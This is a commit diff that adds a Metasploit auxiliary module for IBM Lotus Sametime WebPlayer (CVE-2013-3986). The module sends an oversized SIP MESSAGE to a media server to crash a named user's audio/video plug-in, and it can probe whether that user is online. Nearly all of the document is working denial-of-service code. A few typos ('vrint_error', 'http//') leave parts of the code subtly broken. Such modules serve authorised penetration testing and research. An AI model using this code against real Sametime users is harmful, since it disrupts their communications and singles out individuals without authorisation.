Land rapid7#2801, Land @kicks4kittens IBM Sametime modules

Author: jvazquez-r7

modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb

@@ -0,0 +1,235 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'       => 'IBM Lotus Sametime WebPlayer DoS',
+      'Description'  => %q{
+        This module exploits a known flaw in the IBM Lotus Sametime WebPlayer
+        version 8.5.2.1392 (and prior) to cause a denial of service condition
+        against specific users. For this module to function the target user
+        must be actively logged into the IBM Lotus Sametime server and have
+        the Sametime Audio Visual browser plug-in (WebPlayer) loaded as a
+        browser extension. The user should have the WebPlayer plug-in active
+        (i.e. be in a Sametime Audio/Video meeting for this DoS to work correctly.
+      },
+      'Author'     =>
+        [
+          'Chris John Riley', # Vulnerability discovery
+          'kicks4kittens' # Metasploit module
+        ],
+      'License'    => MSF_LICENSE,
+      'Actions'    =>
+        [
+          ['DOS',
+            {
+              'Description' => 'Cause a Denial Of Service condition against a connected user'
+            }
+          ],
+          ['CHECK',
+            {
+              'Description' => 'Checking if targeted user is online'
+            }
+          ]
+        ],
+      'DefaultAction'  => 'DOS',
+      'References'   =>
+        [
+          [ 'CVE', '2013-3986' ],
+          [ 'OSVDB', '99552' ],
+          [ 'BID', '63611'],
+          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21654041' ],
+          [ 'URL', 'http://xforce.iss.net/xforce/xfdb/84969' ]
+        ],
+      'DisclosureDate' => 'Nov 07 2013'))
+
+    register_options(
+      [
+        Opt::RPORT(5060),
+        OptAddress.new('RHOST', [true, 'The Sametime Media Server']),
+        OptString.new('SIPURI', [
+          true,
+          'The SIP URI of the user to be targeted',
+          '<target_email_address>@<sametime_media_server_FQDN>'
+        ]),
+        OptInt.new('TIMEOUT', [ true,  'Set specific response timeout', 0])
+      ], self.class)
+
+  end
+
+  def setup
+    # cleanup SIP target to ensure it's in the correct format to use
+    @sipuri = datastore['SIPURI']
+    if @sipuri[0, 4].downcase == "sip:"
+      # remove sip: if present in string
+      @sipuri = @sipuri[4, @sipuri.length]
+    end
+    if @sipuri[0, 12].downcase == "webavclient-"
+      # remove WebAVClient- if present in string
+      @sipuri = @sipuri[12, @sipuri.length]
+    end
+  end
+
+  def run
+    # inform user of action currently selected
+    print_status("#{peer} - Action: #{action.name} selected")
+
+    # CHECK action
+    if action.name == 'CHECK'
+      print_status("#{peer} - Checking if user #{@sipuri} is online")
+      if check_user
+        print_good("#{peer} - User online")
+      else
+        print_status("#{peer} - User offline")
+      end
+      return
+    end
+
+    # DOS action
+    print_status("#{peer} - Checking if user #{@sipuri} is online")
+    check_result = check_user
+
+    if check_result == false
+      print_error("#{peer} - User is already offline... Exiting...")
+      return
+    end
+
+    # only proceed if action is DOS the target user is
+    # online or the CHECKUSER option has been disabled
+    print_status("#{peer} - Targeting user: #{@sipuri}...")
+    dos_result = dos_user
+
+    if dos_result
+      print_good("#{peer} - User is offline, DoS was successful")
+    else
+      print_error("#{peer} - User is still online")
+    end
+
+  end
+
+  def peer
+    "#{rhost}:#{rport}"
+  end
+
+  def dos_user
+    length = 12000 # enough to overflow the end of allocated memory
+    msg = create_message(length)
+    res = send_msg(msg)
+
+    if res.nil?
+      vprint_good("#{peer} - User #{@sipuri} is no responding")
+      return true
+    elsif res =~ /430 Flow Failed/i
+      vprint_good("#{peer} - DoS packet successful. Response received (430 Flow Failed)")
+      vprint_good("#{peer} - User #{@sipuri} is no longer responding")
+      return true
+    elsif res =~ /404 Not Found/i
+      vprint_error("#{peer} - DoS packet appears successful. Response received (404 Not Found)")
+      vprint_status("#{peer} - User appears to be currently offline or not in a Sametime video session")
+      return true
+    elsif res =~ /200 OK/i
+      vrint_error("#{peer} - DoS packet unsuccessful. Response received (200)")
+      vrint_status("#{peer} - Check user is running an effected version of IBM Lotus Sametime WebPlayer")
+      return false
+    else
+      vprint_status("#{peer} - Unexpected response")
+      return true
+    end
+  end
+
+  # used to check the user is logged into Sametime and after DoS to check success
+  def check_user
+    length = Rex::Text.rand_text_numeric(2) # just enough to check response
+    msg = create_message(length)
+    res = send_msg(msg)
+
+    # check response for current user status - common return codes
+    if res.nil?
+      vprint_error("#{peer} - No response")
+      return false
+    elsif res =~ /430 Flow Failed/i
+      vprint_good("#{peer} - User #{@sipuri} is no longer responding (already DoS'd?)")
+      return false
+    elsif res =~ /404 Not Found/i
+      vprint_error("#{peer} - User #{@sipuri} is currently offline or not in a Sametime video session")
+      return false
+    elsif res =~ /200 OK/i
+      vprint_good("#{peer} - User #{@sipuri} is online")
+      return true
+    else
+      vprint_error("#{peer} - Unknown server response")
+      return false
+    end
+  end
+
+  def create_message(length)
+    # create SIP MESSAGE of specified length
+    vprint_status("#{peer} - Creating SIP MESSAGE packet #{length} bytes long")
+
+    source_user = Rex::Text.rand_text_alphanumeric(rand(8)+1)
+    source_host = Rex::Socket.source_address(datastore['RHOST'])
+    src = "#{source_host}:#{datastore['RPORT']}"
+    cseq = Rex::Text.rand_text_numeric(3)
+    message_text = Rex::Text.rand_text_alphanumeric(length.to_i)
+    branch = Rex::Text.rand_text_alphanumeric(7)
+
+    # setup SIP message in the correct format expected by the server
+    data =  "MESSAGE sip:WebAVClient-#{@sipuri} SIP/2.0" + "\r\n"
+    data << "Via: SIP/2.0/TCP #{src};branch=#{branch}.#{"%.8x" % rand(0x100000000)};rport;alias" + "\r\n"
+    data << "Max-Forwards: 80\r\n"
+    data << "To: sip:WebAVClient-#{@sipuri}" + "\r\n"
+    data << "From: sip:#{source_user}@#{src};tag=70c00e8c" + "\r\n"
+    data << "Call-ID: #{rand(0x100000000)}@#{source_host}" + "\r\n"
+    data << "CSeq: #{cseq} MESSAGE" + "\r\n"
+    data << "Content-Type: text/plain;charset=utf-8" + "\r\n"
+    data << "User-Agent: #{source_user}\r\n"
+    data << "Content-Length: #{message_text.length}" + "\r\n\r\n"
+    data << message_text
+
+    return data
+  end
+
+  def timing_get_once(s, length)
+    if datastore['TIMEOUT'] and datastore['TIMEOUT'] > 0
+      return s.get_once(length, datastore['TIMEOUT'])
+    else
+      return s.get_once(length)
+    end
+  end
+
+  def send_msg(msg)
+    begin
+      s = connect
+      # send message and store response
+      s.put(msg + "\r\n\r\n") rescue nil
+      # read response
+      res = timing_get_once(s, 25)
+      if res == "\r\n"
+        # retry request
+        res = timing_get_once(s, 25)
+      end
+      return res
+    rescue ::Rex::ConnectionRefused
+      print_status("#{peer} - Unable to connect")
+      return nil
+    rescue ::Errno::ECONNRESET
+      print_status("#{peer} - DoS packet successful, host not responding.")
+      return nil
+    rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+      print_status("#{peer} - Couldn't connect")
+      return nil
+    ensure
+      # disconnect socket if still open
+      disconnect if s
+    end
+  end
+end